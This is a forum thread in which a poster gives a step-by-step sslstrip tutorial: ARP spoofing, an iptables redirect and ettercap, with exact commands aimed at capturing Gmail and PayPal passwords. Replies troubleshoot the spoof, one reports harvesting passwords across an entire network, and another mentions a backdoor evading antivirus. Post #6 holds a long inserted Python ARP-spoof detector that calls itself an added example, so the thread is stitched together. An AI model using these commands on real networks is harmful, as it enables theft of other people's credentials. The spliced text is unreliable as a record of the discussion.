
Thread: [Video+Tutorial] How to: Crack & Sniff SSL / HTTPS (sslstrip)


  1. #1

    [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/download.php?ykgjnkyejku
    Commands: http://pastebin.com/fd6eadf7


    What is this?

    This video shows that SSL encryption on its own isn't secure. Proof of this is given by capturing a web-based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > A 'Man In The Middle' attack is performed, so all the traffic flows through the attacker.
    > HTTP traffic on port 80 is picked out and then redirected / forwarded to a different port.
    > SSLStrip is listening on that port and removes the SSL connection before passing the page back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Target's IP: 192.168.1.6
    Gateway: 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/ettercap.conf
    # uncomment redir_command_off in the iptables, linux section
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0

    sslstrip -a -k -f
    ettercap -T -q -i wlan0


    Notes:

    You could save the packets instead and then look through them later, in case ettercap doesn't pick up the information you need!
    Video length: 03:55

    Capture length: 4:41
    Song: 16 Bit Lolitas - Nobody Seems To Care

    Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
    Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    Just burned his ISO | Join Date: Jul 2009 | Posts: 7

    Very nice tut - keep up the good work

  3. #3
    Just burned his ISO | Join Date: Nov 2008 | Posts: 1

    Didn't work for me, but the target machine was running Ubuntu 9.04. It appears as if Ubuntu simply didn't accept the ARP spoof. However, if I reversed the ARP spoof (arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100), the target machine couldn't reach the network (obviously, since the router attempted to route traffic from the target to my attacking machine).

    Is Ubuntu just not susceptible to this type of attack, or am I doing something wrong?

  4. #4
    Gitsnik (Very good friend of the forum) | Join Date: Jan 2010 | Location: The Crystal Wind | Posts: 851

    Quote Originally Posted by VillageIdiot View Post
    Didn't work for me, but the target machine was running Ubuntu 9.04. It appears as if Ubuntu simply didn't accept the ARP spoof. However, if I reversed the ARP spoof (arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100), the target machine couldn't reach the network (obviously, since the router attempted to route traffic from the target to my attacking machine).

    Is Ubuntu just not susceptible to this type of attack, or am I doing something wrong?
    Sounds like you didn't pass the packet forward through your machine.

    Try typing "arp -a" on your Ubuntu machine to see if the MAC changes before and then during the spoof.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    mixit (Member) | Join Date: Jan 2010 | Posts: 104

    Thanks

    Thanks for the great tutorial! Followed this tutorial exactly and it worked seamlessly. No error messages appeared on the target computers and there was very little network slowdown. Also I tried setting 192.168.1.255 as the target and I was able to retrieve passwords from the entire network.

    The target machines I tested against included a Vista laptop with Mozilla 3.0 and an XP SP3 desktop with Mozilla 3.0.

  6. #6
    Junior Member | Join Date: Dec 2007 | Posts: 88

    Cool tutorial !!

    Now I'm worried. I go to internet cafes often.

    1. Is there any way to detect if someone is ARP spoofing my traffic (assuming I'm the victim)?
    2. As suggested in a previous post, can someone capture all wifi traffic and later decrypt, replay on i lo and get the usernames and passwords? If so, does the victim have any tools to prevent this?
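The reply above suggests comparing "arp -a" before and during the spoof; the question here asks how a victim can detect it. The following script, an added example that is not from this thread, automates that check on a Linux host. It parses the /proc/net/arp table format, compares a baseline snapshot with a later one, and reports the two classic poisoning indicators: the gateway's MAC address changing, and one MAC address claiming several IP addresses (an attacking interface answering for the gateway as well as for itself). The two snapshots embedded below are constructed sample data, not real captures, and the gateway address 192.168.1.1 is taken from the tutorial's network setup.

```python
"""Detect ARP cache poisoning by comparing /proc/net/arp snapshots.

Added example, not part of the original forum thread. Assumes the Linux
/proc/net/arp text layout:
    IP address  HW type  Flags  HW address  Mask  Device
"""
from __future__ import annotations

from collections import defaultdict

# Constructed baseline snapshot (not a real capture): the gateway
# 192.168.1.1 and one LAN peer each resolve to their own MAC.
SNAPSHOT_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0
192.168.1.6      0x1         0x2         aa:bb:cc:dd:ee:06     *        wlan0
"""

# Constructed snapshot taken while the cache is poisoned: the gateway entry
# now carries the MAC of another LAN host (192.168.1.50 in this sample), so
# that MAC appears twice in the table.
SNAPSHOT_DURING = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:50     *        wlan0
192.168.1.6      0x1         0x2         aa:bb:cc:dd:ee:06     *        wlan0
192.168.1.50     0x1         0x2         aa:bb:cc:dd:ee:50     *        wlan0
"""


def parse_proc_arp(text: str) -> dict[str, str]:
    """Return {ip: mac} from /proc/net/arp text.

    The first line is the column header. Entries with flags 0x0 (incomplete)
    or an all-zero MAC are unresolved and are skipped, since there is no
    hardware address to compare yet.
    """
    table: dict[str, str] = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        if flags == "0x0" or mac == "00:00:00:00:00:00":
            continue
        table[ip] = mac
    return table


def duplicate_macs(table: dict[str, str]) -> dict[str, list[str]]:
    """Return MACs that appear for more than one IP, with the IPs they claim."""
    by_mac: dict[str, list[str]] = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def compare_snapshots(before: dict[str, str], after: dict[str, str],
                      gateway_ip: str) -> list[str]:
    """Return human-readable alerts describing poisoning indicators.

    A gateway MAC change between snapshots is the strongest signal; a MAC
    shared by several IPs is a supporting heuristic (see usage note).
    """
    alerts: list[str] = []
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    for mac, ips in duplicate_macs(after).items():
        alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(ips)}")
    return alerts


def read_live_table(path: str = "/proc/net/arp") -> dict[str, str]:
    """Read the host's current ARP table (Linux only)."""
    with open(path, encoding="ascii") as handle:
        return parse_proc_arp(handle.read())


if __name__ == "__main__":
    # Stand-alone demo on the constructed snapshots; to watch a real host,
    # take a baseline with read_live_table() and re-read it periodically.
    baseline = parse_proc_arp(SNAPSHOT_BEFORE)
    current = parse_proc_arp(SNAPSHOT_DURING)
    for alert in compare_snapshots(baseline, current, "192.168.1.1") or ["no change"]:
        print(alert)
```

Run it as a cron job or a loop that re-reads the live table every few seconds and keeps the first snapshot as the baseline. The duplicate-MAC check can fire legitimately when a router or a virtualisation host answers for several addresses on one interface, so treat it as a supporting signal; a changed gateway MAC is the one to act on. A static entry for the gateway ("arp -s <gateway-ip> <gateway-mac>") pins the mapping so later spoofed replies are ignored, and on a network you control, switch-level dynamic ARP inspection prevents the poisoned replies from reaching hosts at all.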

  7. #7
    kazalku (Member) | Join Date: Feb 2009 | Posts: 416

    Nice tut... one small point - the exe for the backdoor is getting caught by AV as a trojan... grrrrr. It can escape from half of the AV in VirusTotal but .....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8
    imported_evanuz (Just burned his ISO) | Join Date: Dec 2008 | Posts: 2

    How do I save the packets?

  9. #9


    Nice work, thanks for posting.

    Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  10. #10


    Quote Originally Posted by kazalku View Post
    Nice tut... one small point - the exe for the backdoor is getting caught by AV as a trojan... grrrrr. It can escape from half of the AV in VirusTotal but .....
    kazalku,
    Thanks! But I'm not using SBD this time around! Plus I don't have any AV running on my target's PC!

    evanuz,
    I use:
    sslstrip -a -k -f --write /root/output-ssl
    You can then do
    kate /root/output-ssl
    OR
    less /root/output-ssl
    OR
    grep [username] /root/output-ssl
    freemymind,
    Thanks for the thanks!
    The music cuts out!? :O *goes and checks*


    Edit:
    Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

